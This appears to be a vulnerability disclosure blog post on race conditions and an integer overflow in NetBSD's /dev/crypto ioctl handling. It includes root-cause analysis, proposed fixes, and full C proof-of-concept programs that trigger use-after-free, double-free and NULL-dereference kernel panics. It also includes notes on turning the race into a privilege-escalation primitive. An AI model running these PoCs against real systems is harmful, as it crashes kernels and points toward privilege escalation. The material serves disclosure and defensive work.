Introduction#

The NetBSD opencrypto framework provides a standardized interface for kernel-level cryptographic operations, allowing userspace applications to leverage hardware acceleration. This post breaks down three distinct vulnerabilities discovered in the ioctl handling of the crypto operations in /dev/crypto reachable from an unpriviledged user. These vulnerabilities were discovered through fuzzing with Syzkaller. These bugs were assigned: CVE-2026-32848 (Session lifecycle race condition → UAF / double-free) and CVE-2026-32849 (Integer handling flaw → NULL pointer dereference).

UAF, Double-Free, and NULL Dereference#

The vulnerabilities found in cryptof_ioctl and cryptodev_op highlight a fundamental architectural issue: the lack of proper synchronization between session management and active crypto operations.

The Session Lifetime Race (CWE-416): A race condition between CIOCCRYPT (executing an operation) and CIOCFSESSION (tearing down a session). Because the global mutex is released prematurely, a session can be freed while it is still being accessed, resulting in a Use-After-Free.
Concurrent UIO Race: (linked to the first bug) By storing mutable request state directly within the shared session structure, the kernel fails to protect against multiple threads using the same session ID. This leads to a heap corruption (uaf or double free depending on the window) as threads overwrite each other’s allocations.
Integer overflow (leading to CWE-476): A logic error in cryptodev_op allows a user-controlled unsigned value to overflow a signed integer. This causes the kernel to bypass critical memory allocations while continuing with data copies, resulting in a NULL Pointer Dereference and a system-wide kernel panic.

Race Condition in `cryptof_ioctl` / `cryptodev_op`: Use-After-Free & Double-Free#

Affected Component#

Field	Value
File	`sys/opencrypto/cryptodev.c`
Functions	`cryptof_ioctl()` (`CIOCCRYPT`, `CIOCFSESSION`), `cryptodev_op()`
Type	CWE-416: Use-After-Free / CWE-415: Double-Free
Impact	Kernel panic, heap corruption primitive

CIOCCRYPT/CIOCFSESSION Session Lifetime Race#

CIOCCRYPT drops cryptodev_mtx after csefind but before cryptodev_op completes. A concurrent CIOCFSESSION (or cryptof_close) on another thread can call csedelete + csefree on the same session in this window, causing cryptodev_op to operate on a freed cse.

1
cse = csefind(fcr, cop->ses);
2
mutex_exit(&cryptodev_mtx);   /* window opens here */
3
/* concurrent CIOCFSESSION frees cse */
4
error = cryptodev_op(cse, cop, curlwp);  /* UAF */

Concurrent `cryptodev_op` on the Same Session: `uio` Race#

cse->uio and cse->iovec are stored directly in the csession struct. When two threads call CIOCCRYPT with the same session ID simultaneously, both enter cryptodev_op with the same cse pointer and race on:

1
cse->uio.uio_iov[0].iov_len  = iov_len;
2
cse->uio.uio_iov[0].iov_base = kmem_alloc(iov_len, KM_SLEEP);  /* both threads allocate */

Thread B overwrites the pointer allocated by thread A. Both threads then reach the bail: cleanup and free whichever pointer is currently in cse->uio.uio_iov[0].iov_base, producing a double-free on one allocation and a leak on the other.

1
bail:
2
    if (cse->uio.uio_iov[0].iov_base)
3
        kmem_free(cse->uio.uio_iov[0].iov_base, iov_len);  /* double-free */

Root Cause#

Both bugs share the same underlying cause: csession embeds mutable per-operation state (uio, iovec, error) directly in the session struct, and CIOCCRYPT provides no per-session serialization after releasing cryptodev_mtx.

Proof of Concept#

See attached PoC. poc_uaf_cioccrypt_race() races CIOCCRYPT against CIOCFSESSION to trigger Bug 1. poc_uio_race() hammers the same session from 8 threads to trigger Bug 2.

Fix#

Add a per-csession reference count (or rwlock) incremented by csefind and decremented after cryptodev_op returns, so csefree blocks until all in-flight operations complete.
Move uio/iovec off the csession struct and onto the stack (or a per-call allocation) inside cryptodev_op to eliminate the shared mutable state entirely.

1
#include <sys/types.h>
2
#include <sys/ioctl.h>
3
#include <sys/fcntl.h>
4
#include <crypto/cryptodev.h>
5
#include <pthread.h>
6
#include <unistd.h>
7
#include <stdio.h>
8
#include <stdlib.h>
9
#include <string.h>
10
#include <err.h>
11

12
static int cryptofd;
13
static uint32_t shared_ses;
14
static volatile int stop;
15

16
static uint32_t
17
make_session(int fd)
18
{
19
    struct session_op sop;
20
    uint8_t key[16];
21

22
    memset(&sop, 0, sizeof(sop));
23
    memset(key, 0x41, sizeof(key));
24
    sop.cipher   = CRYPTO_AES_CBC;
25
    sop.keylen   = sizeof(key);
26
    sop.key      = key;
27

28
    if (ioctl(fd, CIOCGSESSION, &sop) < 0)
29
        err(1, "CIOCGSESSION");
30

31
    return sop.ses;
32
}
33

34
static void *
35
thread_crypt(void *arg)
36
{
37
    struct crypt_op cop;
38
    uint8_t src[32], dst[32], iv[16];
39

40
    memset(src, 0x41, sizeof(src));
41
    memset(iv,  0x00, sizeof(iv));
42

43
    while (!stop) {
44
        memset(&cop, 0, sizeof(cop));
45
        cop.ses = shared_ses;
46
        cop.op  = COP_ENCRYPT;
47
        cop.len = sizeof(src);
48
        cop.src = src;
49
        cop.dst = dst;
50
        cop.iv  = iv;
51
        ioctl(cryptofd, CIOCCRYPT, &cop);
52
    }
53
    return NULL;
54
}
55

56
static void *
57
thread_free(void *arg)
58
{
59
    while (!stop) {
60
        uint32_t ses = shared_ses;
61
        ioctl(cryptofd, CIOCFSESSION, &ses);
62
        shared_ses = make_session(cryptofd);
63
    }
64
    return NULL;
65
}
66

67
static void
68
poc_uaf_cioccrypt_race(void)
69
{
70
    pthread_t ta, tb;
71

72
    printf("[*] PoC 1: CIOCCRYPT/CIOCFSESSION UAF race\n");
73

74
    cryptofd = open("/dev/crypto", O_RDWR);
75
    if (cryptofd < 0)
76
        err(1, "open /dev/crypto");
77

78
    shared_ses = make_session(cryptofd);
79
    stop = 0;
80

81
    pthread_create(&ta, NULL, thread_crypt, NULL);
82
    pthread_create(&tb, NULL, thread_free,  NULL);
83

84
    sleep(5);
85
    stop = 1;
86

87
    pthread_join(ta, NULL);
88
    pthread_join(tb, NULL);
89

90
    close(cryptofd);
91
    printf("[*] PoC 1 done (check dmesg for KCSAN/panic)\n");
92
}
93

94
#define NTHREADS 8
95

96
static uint32_t poc2_ses;
97
static int      poc2_fd;
98

99
static void *
100
thread_crypt_same_ses(void *arg)
101
{
102
    struct crypt_op cop;
103
    uint8_t src[32], dst[32], iv[16];
104
    int i;
105

106
    memset(src, 0x42, sizeof(src));
107
    memset(iv,  0x00, sizeof(iv));
108

109
    for (i = 0; i < 10000; i++) {
110
        memset(&cop, 0, sizeof(cop));
111
        cop.ses = poc2_ses;
112
        cop.op  = COP_ENCRYPT;
113
        cop.len = sizeof(src);
114
        cop.src = src;
115
        cop.dst = dst;
116
        cop.iv  = iv;
117
        ioctl(poc2_fd, CIOCCRYPT, &cop);
118
    }
119
    return NULL;
120
}
121

122
static void
123
poc_uio_race(void)
124
{
125
    pthread_t threads[NTHREADS];
126
    int i;
127

128
    printf("[*] PoC 2: concurrent CIOCCRYPT same session (cse->uio race)\n");
129

130
    poc2_fd = open("/dev/crypto", O_RDWR);
131
    if (poc2_fd < 0)
132
        err(1, "open /dev/crypto");
133

134
    poc2_ses = make_session(poc2_fd);
135

136
    for (i = 0; i < NTHREADS; i++)
137
        pthread_create(&threads[i], NULL, thread_crypt_same_ses, NULL);
138
    for (i = 0; i < NTHREADS; i++)
139
        pthread_join(threads[i], NULL);
140

141
    close(poc2_fd);
142
    printf("[*] PoC 2 done\n");
143
}
144

145
int
146
main(void)
147
{
148
    poc_uaf_cioccrypt_race();
149
    poc_uio_race();
150
    return 0;
151
}

NULL Pointer Dereference in cryptodev_op#

Field	Value
File	`sys/opencrypto/cryptodev.c`
Function	`cryptodev_op()`
Type	CWE-190: Integer Overflow / CWE-476: NULL Pointer Dereference
Impact	Kernel panic (DoS)

Root Cause#

iov_len is declared as int (signed) but assigned from cop->dst_len which is u_int (unsigned). When cop->dst_len > INT_MAX, the assignment produces a negative value — undefined behavior per the C standard. On x86-64 with -O2, the compiler may eliminate the subsequent safety check entirely.

1
int iov_len = cop->len;           /* signed */
2
if ((cse->tcomp) && cop->dst_len) {
3
    if (iov_len < cop->dst_len)
4
        iov_len = cop->dst_len;   /* UB: u_int -> int, wraps negative */
5
}
6
/* size_t <- negative int -> 0xffffffff80000001 */
7
cse->uio.uio_iov[0].iov_len = iov_len;
8
/* FALSE or optimized away under -O2 */
9
if (iov_len > 0)
10
    cse->uio.uio_iov[0].iov_base = kmem_alloc(iov_len, KM_SLEEP);
11
/* corrupted: 0xffffffff80000001 */
12
cse->uio.uio_resid = cse->uio.uio_iov[0].iov_len;
13
/* iov_base = NULL -> fault */
14
copyin(cop->src, cse->uio.uio_iov[0].iov_base, cop->len);

Trigger Conditions#

Field	Value
Session type	Compression session (`CRYPTO_DEFLATE_COMP` or `CRYPTO_GZIP_COMP`)
`cop->dst_len`	`> INT_MAX` (e.g. `0x80000001`)
`cop->dst_len`	`> cop->len` to trigger the `iov_len` overwrite path

Proof-of-concept:

1
#include <sys/types.h>
2
#include <sys/ioctl.h>
3
#include <sys/fcntl.h>
4
#include <crypto/cryptodev.h>
5
#include <unistd.h>
6
#include <stdio.h>
7
#include <stdlib.h>
8
#include <string.h>
9
#include <err.h>
10

11
/*
12
 * PoC: two bugs demonstrated
13
 *
14
 * Bug A: iov_len signed overflow → NULL iov_base → copyin NULL ptr
15
 *   Requires: tcomp session, dst_len > INT_MAX
16
 *   Effect: copyin(src, NULL, len) → kernel fault
17
 *
18
 * Bug B: large iov_len allocation via dst_len, then early bail
19
 *   via cop->iv on compression-only session (crde==NULL)
20
 *   Effect: allocates large buffer, bails, frees correctly BUT
21
 *           the copyin into that large buffer happens BEFORE the
22
 *           iv check — so we get copyin of 16 bytes into a large
23
 *           buffer then free it — demonstrates the logic inversion
24
 *           (should validate iv before allocating)
25
 */
26

27
static int
28
open_crypto(void)
29
{
30
    int fd = open("/dev/crypto", O_RDWR);
31
    if (fd < 0) err(1, "open /dev/crypto");
32
    return fd;
33
}
34

35
static uint32_t
36
make_comp_session(int fd, int alg)
37
{
38
    struct session_op sop;
39
    memset(&sop, 0, sizeof(sop));
40
    sop.comp_alg = alg;
41
    if (ioctl(fd, CIOCGSESSION, &sop) < 0)
42
        err(1, "CIOCGSESSION");
43
    printf("[*] comp session id=%u alg=%d\n", sop.ses, alg);
44
    return sop.ses;
45
}
46

47
static uint32_t
48
make_cipher_session(int fd)
49
{
50
    struct session_op sop;
51
    uint8_t key[16];
52
    memset(&sop, 0, sizeof(sop));
53
    memset(key, 0x41, sizeof(key));
54
    sop.cipher = CRYPTO_AES_CBC;
55
    sop.keylen = sizeof(key);
56
    sop.key    = key;
57
    if (ioctl(fd, CIOCGSESSION, &sop) < 0)
58
        err(1, "CIOCGSESSION cipher");
59
    printf("[*] cipher session id=%u\n", sop.ses);
60
    return sop.ses;
61
}
62

63
/*
64
 * Bug A: NULL iov_base via signed overflow of iov_len
65
 *
66
 * Execution path:
67
 *   cop->len=16 → iov_len=16
68
 *   cop->dst_len=0x80000001 → iov_len=0x80000001 (UB, negative as int)
69
 *   iov_len > 0 → FALSE → iov_base not allocated → NULL
70
 *   uio_resid = (size_t)(negative) → 0xffffffff80000001
71
 *   copyin(cop->src, NULL, 16) → fault
72
 */
73
static void
74
bug_a_null_iov_base(void)
75
{
76
    int fd = open_crypto();
77
    uint32_t ses = make_comp_session(fd, CRYPTO_DEFLATE_COMP);
78

79
    struct crypt_op cop;
80
    uint8_t src[16], dst[16];
81
    memset(src, 0x41, sizeof(src));
82
    memset(&cop, 0, sizeof(cop));
83

84
    cop.ses     = ses;
85
    cop.op      = COP_COMP;
86
    cop.len     = 16;
87
    cop.src     = src;
88
    cop.dst     = dst;
89
    cop.dst_len = 0x80000001;   /* > INT_MAX → iov_len goes negative */
90
    cop.iv      = NULL;
91
    cop.mac     = NULL;
92

93
    printf("[*] Bug A: dst_len=0x%x → iov_len overflow\n", cop.dst_len);
94
    printf("    expected: copyin to NULL → kernel fault/panic\n");
95
    if (ioctl(fd, CIOCCRYPT, &cop) < 0)
96
        warn("    CIOCCRYPT returned error (may have faulted in kernel)");
97
    else
98
        printf("    [!] returned OK — check dmesg\n");
99

100
    close(fd);
101
}
102

103
int
104
main(void)
105
{
106
    printf("=== cryptodev_op vulnerability PoC ===\n\n");
107

108
    printf("--- Bug A: iov_len signed overflow ---\n");
109
    bug_a_null_iov_base();
110
    printf("\n");
111
    return 0;
112
}

Impact#

Scenario	Description
SVS enabled	`copyin` faults on NULL `iov_base` — caught by `onfault` table — clean `EFAULT` returned to userspace, no panic.
SVS disabled (KASAN config)	`copyin` may succeed into a mapped page at `0x0`. UIO machinery consumes the corrupted `uio_resid = 0xffffffff80000001` in pointer arithmetic, producing the non-canonical address `0xfffff9000000000`. This triggers a #GP fault which is not handled by the `copyin` `onfault`/`nofault` recovery table (which only covers page faults), resulting in an unrecoverable kernel panic.

Environment#

Depending on your hardware, it might be needed to set kern.cryptodevallowsoft=0 (sysctl -w kern.cryptodevallowsoft=0), by default cryptodev does not allow software requests (and we do not use software implementations in these bugs) but we still need to create sessions and if netbsd is running on qemu, the hardware accelerators will not be available which won’t allow us to create sessions.

So basically: this should not be an issue on system running on real hardware but we need to modify it if we run netbsd in qemu.

Here is my environment but the bugs shown above should be reproducible on any Netbsd kernel until a193196bb9d88f0ce1ecaffdaf07fb69ff1de448.

1
syssec@Syssec:~/netbsd/src$ git diff sys/arch/amd64/conf/GENERIC
2
diff --git a/sys/arch/amd64/conf/GENERIC b/sys/arch/amd64/conf/GENERIC
3
index 0fedb047c3e0..a9d86a097a76 100644
4
--- a/sys/arch/amd64/conf/GENERIC
5
+++ b/sys/arch/amd64/conf/GENERIC
6
@@ -166,8 +166,8 @@ options     KDTRACE_HOOKS   # kernel DTrace hooks
7
 #options       KMSAN_PANIC     # optional
8

9
 # Kernel Code Coverage Driver.
10
-#makeoptions   KCOV=1
11
-#options       KCOV
12
+makeoptions    KCOV=1
13
+options        KCOV
14

15
 # Fault Injection Driver.
16
 #options       FAULT
17
@@ -959,7 +959,7 @@ urlphy* at mii? phy ?                       # Realtek RTL8150L internal PHYs
18
 # USB Controller and Devices
19

20
 # Virtual USB controller
21
-#pseudo-device vhci
22
+pseudo-device  vhci
23

24
 # PCI USB controllers
25
 xhci*  at pci? dev ? function ?        # eXtensible Host Controller
26
@@ -979,7 +979,7 @@ uhci*       at cardbus? function ?          # Universal Host Controller (Intel)
27
 slhci* at pcmcia? function ?           # ScanLogic SL811HS
28

29
 # USB bus support
30
-#usb*  at vhci?
31
+usb*   at vhci?
32
 usb*   at xhci?
33
 usb*   at ehci?
34
 usb*   at ohci?
35
syssec@Syssec:~/netbsd/src$ git status | head
36
On branch trunk
37
Your branch is up to date with 'origin/trunk'.
38
...
39
syssec@Syssec:~/netbsd/src$ git log | head
40
commit a193196bb9d88f0ce1ecaffdaf07fb69ff1de448
41
Author: christos <christos@NetBSD.org>
42
Date:   Sun Mar 8 21:07:26 2026 +0000
43

44
    new tzcode

Exploitability#

Now that we’ve been through the root cause analysis of the vulnerabilities we migh wonder how epxloitable this is, and to be honest I am not sure yet of the answer. The most interesting primitive seems to be the race on uio, if thread A provides a very large iov_len and that thread B races on the uio buffer with a small iov_len value it provides a large heap overflow primitive bug:

1
cse->uio.uio_iov[0].iov_len = iov_len;
2
if (iov_len > 0)
3
    cse->uio.uio_iov[0].iov_base = kmem_alloc(iov_len, KM_SLEEP);
4
// thread A already allocated a buf of size N and thread B allocates a buf of size N-0x1000
5
cse->uio.uio_resid = cse->uio.uio_iov[0].iov_len;
6
DPRINTF("lid[%u]: uio.iov_base %p malloced %d bytes\n",
7
    CRYPTO_SESID2LID(cse->sid),
8
    cse->uio.uio_iov[0].iov_base, iov_len);
9

10
crp = crypto_getreq((cse->tcomp != NULL) + (cse->txform != NULL) + (cse->thash != NULL));
11
if (crp == NULL) {
12
    error = ENOMEM;
13
    goto bail;
14
}
15
DPRINTF("lid[%u]: crp %p\n", CRYPTO_SESID2LID(cse->sid), crp);
16

17
if (cse->tcomp) {
18
    crdc = crp->crp_desc;
19
}
20

21
if (cse->thash) {
22
    crda = crdc ? crdc->crd_next : crp->crp_desc;
23
    if (cse->txform && crda)
24
        crde = crda->crd_next;
25
} else {
26
    if (cse->txform) {
27
        crde = crdc ? crdc->crd_next : crp->crp_desc;
28
    } else if (!cse->tcomp) {
29
        error = EINVAL;
30
        goto bail;
31
    }
32
}
33

34
DPRINTF("ocf[%u]: iov_len %zu, cop->len %u\n",
35
        CRYPTO_SESID2LID(cse->sid),
36
        cse->uio.uio_iov[0].iov_len,
37
        cop->len);
38

39
// If thread B manages to overwrite cse->uio.uio_iov[0].iov_base before reaching this copyin, the heap overflow primitive is possible
40
// leading to a large heap overflow from thread A which is using the large cop->len on a small overwritten iov_base
41
if ((error = copyin(cop->src, cse->uio.uio_iov[0].iov_base, cop->len)))
42
{
43
    printf("copyin failed %s %d \n", (char *)cop->src, error);
44
    goto bail;
45
}

That’s the first exploitation idea I had but the race is a little bit tricky. A larger window would be to just reach the end of the cryptodev_op function to trigger the double free primitive:

1
  if (cse->uio.uio_iov[0].iov_base) {
2
    kmem_free(cse->uio.uio_iov[0].iov_base,iov_len);
3
  }

This will reliably lead to a double free with a very flexible size range (from 1 to 256*1024-4 bytes), from there we just need to find interesting objects to spray and to corrupt to achieve a clean privilege escalation. But I will explore this in another blogpost!

Cet objet d’expérience [Erfahrungsmäßige] est la décision et l’acte [der Entschluß und die That] qui s’étendent au-delà du monde; car tout ce qui est susceptible d’expérience provient seulement de la décision et de l’acte. Ils sont la fondation dernière de toutes choses [die lezte Begrün-dung von allem].

(Schelling 1827/28, 75)

Introduction#

UAF, Double-Free, and NULL Dereference#

Race Condition in cryptof_ioctl / cryptodev_op: Use-After-Free & Double-Free#

Affected Component#

CIOCCRYPT/CIOCFSESSION Session Lifetime Race#

Concurrent cryptodev_op on the Same Session: uio Race#

Root Cause#

Proof of Concept#

Fix#

NULL Pointer Dereference in cryptodev_op#

Root Cause#

Trigger Conditions#

Impact#

Environment#

Exploitability#

Race Condition in `cryptof_ioctl` / `cryptodev_op`: Use-After-Free & Double-Free#

Concurrent `cryptodev_op` on the Same Session: `uio` Race#